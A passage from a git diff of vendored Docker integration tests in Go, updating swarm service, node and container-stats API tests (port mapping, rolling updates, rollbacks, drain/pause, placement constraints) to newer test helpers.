"github.com/go-check/check" -) - -func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor { - return func(s *swarm.Service) { - if s.Spec.EndpointSpec == nil { - s.Spec.EndpointSpec = &swarm.EndpointSpec{} - } - 
s.Spec.EndpointSpec.Ports = portConfig - } -} - -func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { - d := s.AddDaemon(c, true, true) - - // Create a service with a port mapping of 8080:8081. - portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} - serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - // Update the service: changed the port mapping from 8080:8081 to 8082:8083. - updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} - remoteService := d.getService(c, serviceID) - d.updateService(c, remoteService, setPortConfig(updatedPortConfig)) - - // Inspect the service and verify port mapping. - updatedService := d.getService(c, serviceID) - c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) - c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) - c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) - c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go index 23fbdbb740..3954e4b2e0 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go @@ -1,6 +1,7 @@ package main import ( + "context" "encoding/json" "fmt" "net/http" @@ -13,19 +14,20 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) var expectedNetworkInterfaceStats = 
strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ") func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done") + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;usleep 100; do echo 'Hello'; done") id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") @@ -37,7 +39,7 @@ func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) { var cpuPercent = 0.0 - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage) systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage) cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 @@ -64,7 +66,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { id := strings.TrimSpace(out) getGoRoutines := func() int { - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "") + _, body, err := request.Get(fmt.Sprintf("/info")) c.Assert(err, checker.IsNil) info := types.Info{} err = json.NewDecoder(body).Decode(&info) @@ -75,7 +77,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { // When the HTTP connection is closed, the number of goroutines should not increase. 
routines := getGoRoutines() - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/stats", id)) c.Assert(err, checker.IsNil) body.Close() @@ -97,13 +99,13 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) // Retrieve the container address net := "bridge" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { net = "nat" } contIP := findContainerIP(c, id, net) @@ -151,21 +153,21 @@ func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { // On Linux, account for ARP. expRxPkts := preRxPackets + uint64(numPings) expTxPkts := preTxPackets + uint64(numPings) - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { expRxPkts++ expTxPkts++ } c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts, check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts)) c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts, - check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts)) + check.Commentf("Reported less RxPackets than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts)) } func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { // Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 
1.21 testRequires(c, SameHostDaemon, DaemonIsLinux) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) wg := sync.WaitGroup{} @@ -191,7 +193,7 @@ func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { var st *types.StatsJSON - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) err = json.NewDecoder(body).Decode(&st) @@ -208,7 +210,7 @@ func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} { stats := make(map[string]interface{}) - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id)) c.Assert(err, checker.IsNil) defer body.Close() @@ -260,30 +262,32 @@ func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool { func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) { testRequires(c, DaemonIsLinux) - - status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + defer cli.Close() - status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + expected := "No such container: nonexistent" + + _, err = cli.ContainerStats(context.Background(), "nonexistent", true) + c.Assert(err.Error(), checker.Contains, expected) + _, err = cli.ContainerStats(context.Background(), "nonexistent", false) + c.Assert(err.Error(), 
checker.Contains, expected) } func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) { testRequires(c, DaemonIsLinux) - out1, _ := runSleepingContainer(c) + out1 := runSleepingContainer(c) id1 := strings.TrimSpace(out1) c.Assert(waitRun(id1), checker.IsNil) - out2, _ := runSleepingContainer(c, "--net", "container:"+id1) + out2 := runSleepingContainer(c, "--net", "container:"+id1) id2 := strings.TrimSpace(out2) c.Assert(waitRun(id2), checker.IsNil) - ch := make(chan error) + ch := make(chan error, 1) go func() { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id2)) defer body.Close() if err != nil { ch <- err diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go deleted file mode 100644 index 0995ce3833..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport) - - resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json") - c.Assert(err, checker.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - var info types.Info - err = json.NewDecoder(body).Decode(&info) - c.Assert(err, checker.IsNil) - body.Close() - - // don't set a memory limit, the memory limit should be system memory - conName := "foo" - dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top") - c.Assert(waitRun(conName), checker.IsNil) - - resp, body, err = sockRequestRaw("GET", 
fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "") - c.Assert(err, checker.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") - - var v *types.Stats - err = json.NewDecoder(body).Decode(&v) - c.Assert(err, checker.IsNil) - body.Close() - c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go new file mode 100644 index 0000000000..191391620d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go @@ -0,0 +1,127 @@ +// +build !windows + +package main + +import ( + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + nodes := d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + +loop0: + for _, n := range nodes { + for _, d := range []*daemon.Daemon{d1, d2, d3} { + if n.ID == d.NodeID() { + continue loop0 + } + } + c.Errorf("unknown nodeID %v", n.ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + nodes := d.ListNodes(c) + + d.UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + n := d.GetNode(c, nodes[0].ID) + c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { + testRequires(c, Network) + d1 := s.AddDaemon(c, true, true) + d2 := 
s.AddDaemon(c, true, false) + _ = s.AddDaemon(c, true, false) + + nodes := d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + + // Getting the info so we can take the NodeID + d2Info := d2.SwarmInfo(c) + + // forceful removal of d2 should work + d1.RemoveNode(c, d2Info.NodeID, true) + + nodes = d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) + + // Restart the node that was removed + d2.Restart(c) + + // Give some time for the node to rejoin + time.Sleep(1 * time.Second) + + // Make sure the node didn't rejoin + nodes = d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + // start a service, expect balanced distribution + instances := 8 + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0) + + // set d2 back to active + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityActive + }) + + instances = 1 + 
d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + instances = 8 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + // drained node first so we don't get any old containers + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + d2ContainerCount := len(d2.ActiveContainers(c)) + + // set d2 to paused, scale service up, only d1 gets new tasks + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + instances = 14 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances-d2ContainerCount) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, d2ContainerCount) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go new file mode 100644 index 0000000000..1a826c99c6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go @@ -0,0 +1,612 @@ +// +build !windows + +package main + +import ( + "context" + "fmt" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + 
"github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/go-check/check" + "golang.org/x/sys/unix" + "gotest.tools/icmd" +) + +func setPortConfig(portConfig []swarm.PortConfig) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.EndpointSpec == nil { + s.Spec.EndpointSpec = &swarm.EndpointSpec{} + } + s.Spec.EndpointSpec.Ports = portConfig + } +} + +func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service with a port mapping of 8080:8081. + portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} + serviceID := d.CreateService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. + updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} + remoteService := d.GetService(c, serviceID) + d.UpdateService(c, remoteService, setPortConfig(updatedPortConfig)) + + // Inspect the service and verify port mapping. 
+ updatedService := d.GetService(c, serviceID) + c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) + c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + services := d.ListServices(c) + c.Assert(services, checker.NotNil) + c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.CreateService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ServiceInspectOptions{InsertDefaults: true} + + // insertDefaults inserts UpdateConfig when service is fetched by ID + resp, _, err := cli.ServiceInspectWithRaw(context.Background(), id, options) + out := fmt.Sprintf("%+v", resp) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "UpdateConfig") + + // insertDefaults inserts UpdateConfig when service is fetched by ID + resp, _, err = cli.ServiceInspectWithRaw(context.Background(), "top", options) + out = fmt.Sprintf("%+v", resp) + c.Assert(err, checker.IsNil) + c.Assert(string(out), checker.Contains, "UpdateConfig") + + service := d.GetService(c, id) + instances = 5 + d.UpdateService(c, service, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + + d.RemoveService(c, service.ID) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) +} + +func (s 
*DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + instances := 9 + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.GreaterThan, 0) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + // reconciliation on d2 node down + d2.Stop(c) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + // test downscaling + instances = 5 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + d1.CreateService(c, simpleTestService, setGlobalMode) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.Equals, 1) + + d4 := s.AddDaemon(c, true, false) + d5 := s.AddDaemon(c, true, false) + + waitAndAssert(c, 
defaultReconciliationTimeout, d4.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d5.CheckActiveContainerCount, checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:test" + + // create a different tag + for _, d := range daemons { + out, err := d.Cmd("tag", image1, image2) + c.Assert(err, checker.IsNil, check.Commentf(out)) + } + + // create service + instances := 5 + parallelism := 2 + rollbackParallelism := 3 + id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].GetService(c, id) + daemons[0].UpdateService(c, service, setImage(image2)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback used to be a client-side operation. 
+ out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateStartFirst(c *check.C) { + d := s.AddDaemon(c, true, true) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "testhealth:latest" + + // service started from this image won't pass health check + result := cli.BuildCmd(c, image2, cli.Daemon(d), + build.WithDockerfile(`FROM busybox + HEALTHCHECK --interval=1s --timeout=30s --retries=1024 \ + CMD cat /status`), + ) + result.Assert(c, icmd.Success) + + // create service + instances := 5 + parallelism := 2 + rollbackParallelism := 3 + id := d.CreateService(c, serviceForUpdate, setInstances(instances), setUpdateOrder(swarm.UpdateOrderStartFirst), setRollbackOrder(swarm.UpdateOrderStartFirst)) + + checkStartingTasks := func(expected int) []swarm.Task { + var startingTasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, id) + startingTasks = nil + for _, t := range tasks { + if t.Status.State == swarm.TaskStateStarting { + startingTasks = append(startingTasks, t) + } + } + return startingTasks, nil + }, checker.HasLen, expected) + + return startingTasks + } + + makeTasksHealthy := func(tasks []swarm.Task) { + for _, t := range tasks { + containerID := t.Status.ContainerStatus.ContainerID + d.Cmd("exec", containerID, "touch", "/status") + } + } + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, 
d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := d.GetService(c, id) + d.UpdateService(c, service, setImage(image2)) + + // first batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks := checkStartingTasks(parallelism) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks = checkStartingTasks(parallelism) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + + // The old tasks should be running, and the new ones should be starting. + startingTasks = checkStartingTasks(1) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // make it healthy + makeTasksHealthy(startingTasks) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback is a client-side operation. 
+ out, err := d.Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:badtag" + + // create service + instances := 5 + id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].GetService(c, id) + daemons[0].UpdateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) + + // should update 2 tasks and then pause + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) + v, _ := daemons[0].CheckServiceRunningTasks(id)(c) + c.Assert(v, checker.Equals, instances-2) + + // Roll back to the previous version. This uses the CLI because + // rollback used to be a client-side operation. 
+ out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + + // create service + constraints := []string{"node.role==worker"} + instances := 3 + id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + // validate tasks are running on worker nodes + tasks := daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + node := daemons[0].GetNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.role!=worker"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are running on manager nodes + for _, task := range tasks { + node := daemons[0].GetNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.role==nosuchrole"} + id = daemons[0].CreateService(c, simpleTestService, 
setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + // validate tasks are not assigned to any node + tasks = daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].ListNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "low", + } + }) + } + 